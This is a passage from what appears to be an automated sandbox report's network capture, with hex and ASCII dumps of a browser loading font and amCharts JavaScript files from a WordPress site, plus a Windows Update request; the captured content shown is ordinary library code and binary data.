                                                                                                                                          Data Ascii: his),i="flags"in u?String(t.flags):a.call(t),n=new RegExp(t.source,~i.indexOf("g")?i:"g"+i);return n.lastIndex=o(t.lastIndex),new l(n,e)}})},"1qam":function(t,e,i){"use strict";i.d(e,"a",function(){return s});var n=i("m4/l"),r=i("Vs7R"),o=i("Mtpk"),s=func
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 74 72 69 63 74 22 3b 69 2e 64 28 65 2c 22 62 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 29 2c 69 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 29 3b 76 61 72 20 6e 3d 69 28 22 6d 34 2f 6c 22 29 2c 72 3d 69 28 22 56 49 4f 62 22 29 2c 6f 3d 69 28 22 76 4d 71 4a 22 29 2c 73 3d 69 28 22 43 36 64 54 22 29 2c 61 3d 69 28 22 61 4d 37 44 22 29 2c 75 3d 69 28 22 74 6a 4d 53 22 29 2c 6c 3d 69 28 22 44 48 74 65 22 29 2c 68 3d 69 28 22 61 43 69 74 22 29 2c 63 3d 69 28 22 57 67 6c 74 22 29 2c 70 3d 69 28 22 4d 74 70 6b 22 29 2c 64 3d 69 28 22 68 44 35 41 22 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74
                                                                                                                                          Data Ascii: trict";i.d(e,"b",function(){return f}),i.d(e,"a",function(){return g});var n=i("m4/l"),r=i("VIOb"),o=i("vMqJ"),s=i("C6dT"),a=i("aM7D"),u=i("tjMS"),l=i("DHte"),h=i("aCit"),c=i("Wglt"),p=i("Mtpk"),d=i("hD5A"),f=function(t){function e(){var e=t.call(this)||t
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 74 65 6d 70 6c 61 74 65 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 6e 2e 61 78 69 73 46 69 6c 6c 73 2e 74 65 6d 70 6c 61 74 65 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 6e 2e 62 61 73 65 47 72 69 64 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 6e 2e 6c 61 62 65 6c 73 2e 74 65 6d 70 6c 61 74 65 2e 70 61 64 64 69 6e 67 28 32 2c 33 2c 32 2c 33 29 2c 6e 2e 6d 69 6e 48 65 69 67 68 74 3d 76 6f 69 64 20 30 2c 6e 2e 6d 69 6e 57 69 64 74 68 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 6d 61 72 6b 65 72 43 6f 6e 74 61 69 6e 65 72 2e 6c 61 79 6f 75 74 3d 74 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 76 61 6c 75 65 41 78 69
                                                                                                                                          Data Ascii: template.disabled=!0,n.axisFills.template.disabled=!0,n.baseGrid.disabled=!0,n.labels.template.padding(2,3,2,3),n.minHeight=void 0,n.minWidth=void 0,this.markerContainer.layout=t},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype,"valueAxi
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 61 73 65 3f 22 69 22 3a 22 22 29 2b 28 74 2e 6d 75 6c 74 69 6c 69 6e 65 3f 22 6d 22 3a 22 22 29 2b 28 74 2e 75 6e 69 63 6f 64 65 3f 22 75 22 3a 22 22 29 2b 28 74 2e 73 74 69 63 6b 79 3f 22 79 22 3a 22 22 29 2c 70 3d 30 2c 64 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 34 32 39 34 39 36 37 32 39 35 3a 65 3e 3e 3e 30 2c 66 3d 6e 65 77 20 52 65 67 45 78 70 28 74 2e 73 6f 75 72 63 65 2c 68 2b 22 67 22 29 3b 28 6f 3d 6c 2e 63 61 6c 6c 28 66 2c 72 29 29 26 26 21 28 28 73 3d 66 2e 6c 61 73 74 49 6e 64 65 78 29 3e 70 26 26 28 75 2e 70 75 73 68 28 72 2e 73 6c 69 63 65 28 70 2c 6f 2e 69 6e 64 65 78 29 29 2c 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 6f 2e 69 6e 64 65 78 3c 72 2e 6c 65 6e 67 74 68 26 26 63 2e 61 70 70 6c 79 28 75 2c 6f 2e 73 6c 69 63 65 28 31 29 29 2c 61 3d 6f 5b
                                                                                                                                          Data Ascii: ase?"i":"")+(t.multiline?"m":"")+(t.unicode?"u":"")+(t.sticky?"y":""),p=0,d=void 0===e?4294967295:e>>>0,f=new RegExp(t.source,h+"g");(o=l.call(f,r))&&!((s=f.lastIndex)>p&&(u.push(r.slice(p,o.index)),o.length>1&&o.index<r.length&&c.apply(u,o.slice(1)),a=o[
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 65 74 28 74 2c 65 29 7d 2c 6b 65 79 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3d 75 28 74 2c 65 2c 21 31 29 2c 6e 3d 5b 5d 3b 72 65 74 75 72 6e 20 69 26 26 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 6e 2e 70 75 73 68 28 65 29 7d 29 2c 6e 7d 2c 6b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 22 73 79 6d 62 6f 6c 22 3d 3d 6e 28 74 29 3f 74 3a 53 74 72 69 6e 67 28 74 29 7d 2c 65 78 70 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6f 28 6f 2e 53 2c 22 52 65 66 6c 65 63 74 22 2c 74 29 7d 7d 7d 2c 22 36 50 71 59 22 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 76 61 72 20 6e 3d 69 28 22 47 62 31 48 22 29 2c 72 3d 69 28 22 35 2b 53 4b 22 29 2c 6f 3d 69 28 22
                                                                                                                                          Data Ascii: et(t,e)},keys:function(t,e){var i=u(t,e,!1),n=[];return i&&i.forEach(function(t,e){n.push(e)}),n},key:function(t){return void 0===t||"symbol"==n(t)?t:String(t)},exp:function(t){o(o.S,"Reflect",t)}}},"6PqY":function(t,e,i){var n=i("Gb1H"),r=i("5+SK"),o=i("
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 61 61 22 3a 62 3d 61 3e 3d 31 32 3f 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 50 2e 4d 2e 22 29 3a 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 41 2e 4d 2e 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 61 61 61 22 3a 62 3d 61 3e 3d 31 32 3f 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 50 22 29 3a 69 2e 74 72 61 6e 73 6c 61 74 65 28 22 41 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 22 3a 62 3d 6c 2e 67 65 74 31 32 48 6f 75 72 73 28 61 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 68 22 3a 62 3d 6c 2e 70 61 64 53 74 72 69 6e 67 28 6c 2e 67 65 74 31 32 48 6f 75 72 73 28 61 29 2c 32 2c 22 30 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 48 22 3a 62 3d 61 2e 74 6f 53 74 72 69 6e 67 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 48 48 22 3a 62 3d 6c 2e 70 61
                                                                                                                                          Data Ascii: aa":b=a>=12?i.translate("P.M."):i.translate("A.M.");break;case"aaa":b=a>=12?i.translate("P"):i.translate("A");break;case"h":b=l.get12Hours(a).toString();break;case"hh":b=l.padString(l.get12Hours(a),2,"0");break;case"H":b=a.toString();break;case"HH":b=l.pa
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 53 70 72 69 74 65 28 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 5f 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 21 3d 74 26 26 28 74 68 69 73 2e 5f 74 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 3d 74 2c 74 68 69 73 2e 69 6e 76 61 6c 69 64 61 74 65 53 70 72 69 74 65 28 29 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65
                                                                                                                                          Data Ascii: Sprite()},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype,"timezoneOffset",{get:function(){return this._timezoneOffset},set:function(t){this._timezoneOffset!=t&&(this._timezoneOffset=t,this.invalidateSprite())},enumerable:!0,configurable
                                                                                                                                          2024-11-28 10:32:58 UTC8000INData Raw: 64 73 28 29 29 2b 22 2e 22 2b 28 69 3e 39 39 3f 69 3a 22 30 22 2b 73 28 69 29 29 2b 22 5a 22 7d 3a 6f 7d 2c 41 36 41 56 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 29 3b 76 61 72 20 6e 3d 69 28 22 6d 34 2f 6c 22 29 2c 72 3d 69 28 22 54 6a 6c 2b 22 29 2c 6f 3d 69 28 22 78 37 39 58 22 29 2c 73 3d 69 28 22 31 79 79 6a 22 29 2c 61 3d 69 28 22 76 39 55 54 22 29 2c 75 3d 69 28 22 68 4a 35 69 22 29 2c 6c 3d 69 28 22 51 6b 64 70 22 29 2c 68 3d 69 28 22 4d 74 70 6b 22 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 72
                                                                                                                                          Data Ascii: ds())+"."+(i>99?i:"0"+s(i))+"Z"}:o},A6AV:function(t,e,i){"use strict";i.d(e,"a",function(){return c});var n=i("m4/l"),r=i("Tjl+"),o=i("x79X"),s=i("1yyj"),a=i("v9UT"),u=i("hJ5i"),l=i("Qkdp"),h=i("Mtpk"),c=function(t){function e(){var e=t.call(this)||this;r


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          52192.168.2.4498095.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:57 UTC613OUTGET /wp-content/themes/tentamus/assets/fonts/barlow400.woff2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://www.agriparadigma.it
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:58 UTC281INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:58 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Fri, 30 Sep 2022 08:53:05 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 14736
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:58 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: font/woff2
                                                                                                                                          2024-11-28 10:32:58 UTC7911INData Raw: 77 4f 46 32 00 01 00 00 00 00 39 90 00 0e 00 00 00 00 83 04 00 00 39 36 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 0e 1b a1 66 1c 88 50 06 60 00 84 72 11 08 0a 81 b9 0c 81 94 37 0b 84 1c 00 01 36 02 24 03 88 34 04 20 05 83 4a 07 88 4d 1b 99 6d 15 e3 98 55 c0 c6 01 20 0f f4 2b d0 48 44 b0 71 10 90 6d 5c 3e 22 25 27 51 f6 ff c7 e4 c6 10 41 17 a8 b5 f6 43 a1 14 1a 42 09 26 51 a3 0b 23 d4 86 51 7b 4f 4f b9 dd 07 e3 70 32 b3 ec 8b 8b 8f 0d 43 10 ac 53 42 51 91 f9 92 95 54 fa 46 03 ad d2 50 66 87 36 49 38 bf a6 a1 fa a7 15 2b d6 a3 b3 e8 19 e0 4e 8e d8 89 c8 43 df d8 ff ee ec 7e 47 5d 92 4a b2 4a 76 3f 1d 2f e5 25 68 e2 09 e2 4f 64 22 3e c7 f3 d3 79 ff ff 97 e4 e7 55 93 4a 52 4f d3 34 49 93 c6 b4 16 b3 0a 6d 53 13 6a 54 68 a1
                                                                                                                                          Data Ascii: wOF2996fP`r76$4 JMmU +HDqm\>"%'QACB&Q#Q{OOp2CSBQTFPf6I8+NC~G]JJv?/%hOd">yUJRO4ImSjTh
                                                                                                                                          2024-11-28 10:32:58 UTC6825INData Raw: cd f8 85 29 1e 97 a0 30 6d 15 1d e2 c1 ca bb 59 f2 3b fc e2 ac b1 ae d9 bc ad 0f e3 34 46 a5 7a 43 63 85 af 34 9b 14 70 ce 86 ed ed ee 98 3d d3 72 83 23 29 8d 3e 47 ed 19 4e 26 29 21 bc 29 32 1d b7 70 fe 65 b5 ca 66 38 f9 92 cb ff dc 33 0e a3 5a f3 d3 7c 98 0d 4d 8d a5 01 8c 75 18 e7 9b 1c 6e 83 c9 e9 34 15 ae 40 17 fb 16 99 49 ec af 87 ae f0 7d 39 e9 1e 9f 7f 2f 89 7f 5f ce ae c4 97 1d 80 6d 05 9e 67 d9 86 f0 1d cb ae b7 93 9a b1 1f 13 e3 1c 8c 7b a0 33 55 fa 48 a9 e1 8a e2 46 80 32 7f c9 33 57 93 f3 f9 79 17 2b 9f 69 d2 2d 5a c7 21 9f 2e a1 68 b6 91 96 8c 65 c5 09 67 ce e1 50 af 77 6b ca 0e a3 15 cf 42 55 6d 49 69 c6 34 b1 9b 0a 6d 3a 83 ad c8 e8 ac b3 e5 51 05 36 bd e1 4e 43 8f 8c 29 2d 32 5f bf ae 54 99 de 9f 23 89 17 d5 94 4a 75 86 d2 cb 54 1e 08 1f
                                                                                                                                          Data Ascii: )0mY;4FzCc4p=r#)>GN&)!)2pef83Z|Mun4@I}9/_mg{3UHF23Wy+i-Z!.hegPwkBUmIi4m:Q6NC)-2_T#JuT


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          53192.168.2.44981120.109.210.53443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:58 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=EdtAHUGZ27STYf6&MD=WNDZagzh HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                          2024-11-28 10:32:59 UTC560INHTTP/1.1 200 OK
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Expires: -1
                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                          MS-CorrelationId: 492b8c51-2d50-4327-8814-6bc188146d97
                                                                                                                                          MS-RequestId: dcc393a1-f94b-4f61-9464-d357912e1250
                                                                                                                                          MS-CV: 0WXzB3HRoUuXT4L+.0
                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:57 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 30005
                                                                                                                                          2024-11-28 10:32:59 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                          2024-11-28 10:32:59 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          54192.168.2.4498135.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:58 UTC403OUTGET /wp-content/themes/tentamus/assets/scripts/amcharts4/maps.js HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:59 UTC317INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 127200
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:59 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:32:59 UTC7875INData Raw: 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 28 5b 22 63 63 31 65 22 5d 2c 7b 51 4a 37 45 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 69 3d 7b 7d 3b 6e 2e 64 28 69 2c 22 67 65 6f 41 72 65 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 74 7d 29 2c 6e 2e 64 28 69 2c 22 67 65 6f 42 6f 75 6e 64 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 65 7d 29 2c 6e 2e 64 28 69 2c 22 67 65 6f 43 65 6e 74 72 6f 69 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 65 7d 29 2c 6e 2e 64 28 69
                                                                                                                                          Data Ascii: am4internal_webpackJsonp(["cc1e"],{QJ7E:function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0});var i={};n.d(i,"geoArea",function(){return st}),n.d(i,"geoBounds",function(){return te}),n.d(i,"geoCentroid",function(){return pe}),n.d(i
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 5b 32 5d 2f 3d 65 7d 76 61 72 20 76 74 2c 6d 74 2c 79 74 2c 62 74 2c 50 74 2c 53 74 2c 5f 74 2c 4d 74 2c 78 74 2c 77 74 2c 6a 74 3d 6d 28 29 2c 4c 74 3d 7b 70 6f 69 6e 74 3a 43 74 2c 6c 69 6e 65 53 74 61 72 74 3a 4f 74 2c 6c 69 6e 65 45 6e 64 3a 49 74 2c 70 6f 6c 79 67 6f 6e 53 74 61 72 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 74 2e 70 6f 69 6e 74 3d 54 74 2c 4c 74 2e 6c 69 6e 65 53 74 61 72 74 3d 47 74 2c 4c 74 2e 6c 69 6e 65 45 6e 64 3d 44 74 2c 6a 74 2e 72 65 73 65 74 28 29 2c 69 74 2e 70 6f 6c 79 67 6f 6e 53 74 61 72 74 28 29 7d 2c 70 6f 6c 79 67 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 74 2e 70 6f 6c 79 67 6f 6e 45 6e 64 28 29 2c 4c 74 2e 70 6f 69 6e 74 3d 43 74 2c 4c 74 2e 6c 69 6e 65 53 74 61 72 74 3d 4f 74 2c 4c 74 2e 6c 69 6e 65 45
                                                                                                                                          Data Ascii: [2]/=e}var vt,mt,yt,bt,Pt,St,_t,Mt,xt,wt,jt=m(),Lt={point:Ct,lineStart:Ot,lineEnd:It,polygonStart:function(){Lt.point=Tt,Lt.lineStart=Gt,Lt.lineEnd=Dt,jt.reset(),it.polygonStart()},polygonEnd:function(){it.polygonEnd(),Lt.point=Ct,Lt.lineStart=Ot,Lt.lineE
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 70 2e 70 6f 69 6e 74 3d 64 2c 73 2e 6c 69 6e 65 53 74 61 72 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 70 2e 70 6f 69 6e 74 3d 66 2c 73 2e 6c 69 6e 65 45 6e 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 29 7b 75 2e 70 75 73 68 28 5b 74 2c 65 5d 29 2c 6c 2e 70 6f 69 6e 74 28 74 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 6c 2e 6c 69 6e 65 53 74 61 72 74 28 29 2c 75 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 6d 28 75 5b 30 5d 5b 30 5d 2c 75 5b 30 5d 5b 31 5d 29 2c 6c 2e 6c 69 6e 65 45 6e 64 28 29 3b 76 61 72 20 74 2c 65 2c 6e 2c 69 2c 73 3d 6c 2e 63 6c 65 61 6e 28 29 2c 70 3d 63 2e 72 65 73 75 6c 74 28 29 2c 66 3d 70 2e 6c 65 6e 67 74 68 3b 69 66 28 75 2e 70 6f 70 28 29 2c 6f 2e 70 75 73
                                                                                                                                          Data Ascii: function g(){p.point=d,s.lineStart()}function v(){p.point=f,s.lineEnd()}function m(t,e){u.push([t,e]),l.point(t,e)}function y(){l.lineStart(),u=[]}function b(){m(u[0][0],u[0][1]),l.lineEnd();var t,e,n,i,s=l.clean(),p=c.result(),f=p.length;if(u.pop(),o.pus
                                                                                                                                          2024-11-28 10:32:59 UTC8000INData Raw: 6e 74 4d 69 6e 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 65 3d 2b 6e 5b 30 5d 5b 30 5d 2c 74 3d 2b 6e 5b 31 5d 5b 30 5d 2c 6f 3d 2b 6e 5b 30 5d 5b 31 5d 2c 72 3d 2b 6e 5b 31 5d 5b 31 5d 2c 65 3e 74 26 26 28 6e 3d 65 2c 65 3d 74 2c 74 3d 6e 29 2c 6f 3e 72 26 26 28 6e 3d 6f 2c 6f 3d 72 2c 72 3d 6e 29 2c 6d 2e 70 72 65 63 69 73 69 6f 6e 28 76 29 29 3a 5b 5b 65 2c 6f 5d 2c 5b 74 2c 72 5d 5d 7d 2c 6d 2e 73 74 65 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 6d 2e 73 74 65 70 4d 61 6a 6f 72 28 74 29 2e 73 74 65 70 4d 69 6e 6f 72 28 74 29 3a 6d 2e 73 74 65 70 4d 69 6e 6f 72 28 29 7d 2c 6d 2e 73 74 65 70 4d 61 6a 6f 72
                                                                                                                                          Data Ascii: ntMinor=function(n){return arguments.length?(e=+n[0][0],t=+n[1][0],o=+n[0][1],r=+n[1][1],e>t&&(n=e,e=t,t=n),o>r&&(n=o,o=r,r=n),m.precision(v)):[[e,o],[t,r]]},m.step=function(t){return arguments.length?m.stepMajor(t).stepMinor(t):m.stepMinor()},m.stepMajor
